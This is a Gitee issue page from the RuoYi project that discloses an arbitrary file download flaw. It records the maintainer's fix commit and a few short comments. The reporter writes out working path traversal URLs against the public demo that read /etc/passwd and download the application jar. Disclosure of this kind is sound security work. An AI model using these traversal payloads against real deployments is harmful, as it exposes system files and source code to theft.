5.8K Star 42.6K Fork 23.3K

GVP若依/RuoYi

 / 详情

任意文件读取漏洞 紧急

已完成
创建于  
2020-11-16 18:53

项目上线被扫除安全漏洞问题,可以下载服务器上任意文件 。如下:
输入图片说明

输入图片说明

ruoyi在线demo 也复现了这个漏洞,任意文件下载

https://demo.ruoyi.vip/
输入图片说明

复现步骤如下:

  1. 登录 https://demo.ruoyi.vip/
  2. 打开以下链接会自动下载服务器上的文件 (/etc/passwd可以替换为任意文件绝对路径):
    https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../etc/passwd
    输入图片说明
    输入图片说明
    下载的文件如下:输入图片说明

输入图片说明

demo源代码下载地址:https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../home/ruoyi/projects/ruoyi/target/ruoyi.jar

输入图片说明

评论 (3)

fengyibo 创建了任务
fengyibo 关联仓库设置为若依/RuoYi
fengyibo 修改了描述
fengyibo 修改了描述
fengyibo 修改了描述
fengyibo 修改了描述
fengyibo 修改了描述
fengyibo 修改了标题
fengyibo 修改了描述
fengyibo 修改了标题
fengyibo 修改了描述
fengyibo 修改了描述
展开全部操作日志

嗯,多谢提醒。已修复。
阻止任意文件下载漏洞
https://gitee.com/y_project/RuoYi/commit/18f6366f2e6908a151e02d0c18f1aa490e7d0a54

若依 任务状态待办的 修改为已完成

请问下这是什么扫描器,挺厉害的

直接扫的若依的这个漏洞,没什么厉害的。这又不是什么0day

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(4)
1151004 y project 1578942802
Java
1
https://gitee.com/y_project/RuoYi.git
git@gitee.com:y_project/RuoYi.git
y_project
RuoYi
RuoYi

搜索帮助

A270a887 8829481 3d7a4017 8829481